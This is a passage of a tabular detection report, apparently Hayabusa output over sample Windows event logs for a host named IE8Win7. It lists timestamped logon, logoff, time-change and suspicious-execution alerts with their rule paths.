| 113 | 2013-10-24 04:34:54.649 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x39a67 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 114 | 2013-10-24 04:36:30.093 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 115 | 2013-10-24 04:36:30.093 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 116 | 2013-10-24 04:36:39.718 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 117 | 2013-10-24 04:36:44.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 118 | 2013-10-24 04:36:53.245 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 119 | 2013-10-24 04:36:53.245 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 120 | 2013-10-24 04:36:53.245 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 121 | 2013-10-24 04:38:41.448 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x24902 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 122 | 2013-10-24 04:38:41.448 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x24936 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 123 | 2013-10-24 04:38:41.448 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 124 | 2013-10-24 04:38:41.448 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x24902 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 125 | 2013-10-24 04:39:04.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 126 | 2013-10-24 04:39:04.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 127 | 2013-10-24 04:42:34.667 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 128 | 2013-10-24 04:42:34.667 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 129 | 2013-10-24 04:42:34.667 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 130 | 2013-10-24 04:42:56.213 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x24936 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 131 | 2013-10-24 04:45:27.593 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 132 | 2013-10-24 04:45:27.593 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 133 | 2013-10-24 04:45:58.015 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 134 | 2013-10-24 04:46:01.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 135 | 2013-10-24 04:46:10.368 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 136 | 2013-10-24 04:46:10.368 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 137 | 2013-10-24 04:46:10.368 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 138 | 2013-10-24 04:47:07.743 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x19489 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 139 | 2013-10-24 04:47:07.743 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x194bb : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 140 | 2013-10-24 04:47:07.743 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 141 | 2013-10-24 04:47:07.743 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x19489 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 142 | 2013-10-24 04:49:30.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 143 | 2013-10-24 04:49:30.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 144 | 2013-10-24 04:54:00.258 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x194bb | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 145 | 2013-10-24 04:54:45.140 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 146 | 2013-10-24 04:54:45.140 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 147 | 2013-10-24 04:54:58.140 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 148 | 2013-10-24 04:55:02.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 149 | 2013-10-24 04:55:06.370 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 150 | 2013-10-24 04:55:06.370 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 151 | 2013-10-24 04:55:06.370 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 152 | 2013-10-24 04:55:29.463 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x19153 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 153 | 2013-10-24 04:55:29.463 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1917f : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 154 | 2013-10-24 04:55:29.463 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 155 | 2013-10-24 04:55:29.463 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x19153 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 156 | 2013-10-24 04:57:31.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 157 | 2013-10-24 04:57:31.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 158 | 2013-10-24 05:49:57.323 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x1917f | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 159 | 2013-10-24 05:53:53.609 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 160 | 2013-10-24 05:53:53.609 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 161 | 2013-10-24 05:54:11.078 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 162 | 2013-10-24 05:54:23.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 163 | 2013-10-24 05:54:29.619 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 164 | 2013-10-24 05:54:29.619 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 165 | 2013-10-24 05:54:29.619 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 166 | 2013-10-24 05:55:00.775 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 167 | 2013-10-24 05:55:00.775 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 168 | 2013-10-24 05:55:00.775 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 169 | 2013-10-24 05:55:00.775 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x2b15e | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 170 | 2013-10-24 05:56:36.634 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 171 | 2013-10-24 05:56:36.634 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 172 | 2013-10-24 05:56:36.649 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 173 | 2013-10-24 05:56:52.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 174 | 2013-10-24 05:56:52.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 175 | 2013-10-24 06:05:37.180 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x2b18a | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 176 | 2013-10-24 06:07:06.390 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 177 | 2013-10-24 06:07:06.390 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 178 | 2013-10-24 06:07:31.859 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 179 | 2013-10-24 06:07:35.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 180 | 2013-10-24 06:07:44.487 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 181 | 2013-10-24 06:07:44.487 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 182 | 2013-10-24 06:07:44.487 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 183 | 2013-10-24 06:09:53.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 184 | 2013-10-24 06:09:53.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 185 | 2013-10-24 06:13:38.283 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x25519 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 186 | 2013-10-24 06:13:38.283 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 187 | 2013-10-24 06:13:38.283 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x2553c : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 188 | 2013-10-24 06:13:38.283 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x25519 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 189 | 2013-10-24 06:35:27.013 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 190 | 2013-10-24 06:35:27.013 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 191 | 2013-10-24 06:35:27.028 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 192 | 2013-10-24 06:50:27.138 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 193 | 2013-10-24 06:53:45.841 +09:00 | IE8Win7 | 4624 | informational | Logon Type 4 - Batch | User: IEUser : Workstation: IE8WIN7 : IP Address: - : LogonID: 0x15f454 | rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 194 | 2013-10-24 06:53:45.841 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 195 | 2013-10-24 06:53:45.841 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x15f454 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 196 | 2013-10-24 06:53:45.919 +09:00 | IE8Win7 | 4634 | informational | Logoff | User: IEUser : LogonID: 0x15f454 | rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 197 | 2013-10-24 06:53:46.263 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 198 | 2013-10-24 06:53:46.263 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 199 | 2013-10-24 06:53:46.263 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 200 | 2013-10-24 06:53:46.263 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x15f53a | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 201 | 2013-10-24 06:53:46.669 +09:00 | IE8Win7 | 4634 | informational | Logoff | User: IEUser : LogonID: 0x15f546 | rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 202 | 2013-10-24 06:53:46.669 +09:00 | IE8Win7 | 4634 | informational | Logoff | User: IEUser : LogonID: 0x15f53a | rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 203 | 2013-10-24 06:54:01.732 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x2553c | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 204 | 2013-10-24 06:55:02.343 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 205 | 2013-10-24 06:55:02.343 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 206 | 2013-10-24 06:55:25.000 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 207 | 2013-10-24 06:55:32.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 208 | 2013-10-24 06:55:35.625 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 209 | 2013-10-24 06:55:35.625 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0xdafc : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 210 | 2013-10-24 06:55:35.625 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 211 | 2013-10-24 06:55:35.625 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0xdad4 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 212 | 2013-10-24 06:55:37.450 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 213 | 2013-10-24 06:55:37.450 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 214 | 2013-10-24 06:55:37.450 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 215 | 2013-10-24 06:55:44.840 +09:00 | IE8Win7 | 4624 | informational | Logon Type 4 - Batch | User: IEUser : Workstation: IE8WIN7 : IP Address: - : LogonID: 0x13dbc | rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 216 | 2013-10-24 06:55:44.840 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 217 | 2013-10-24 06:55:44.840 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x13dbc | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 218 | 2013-10-24 06:57:51.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
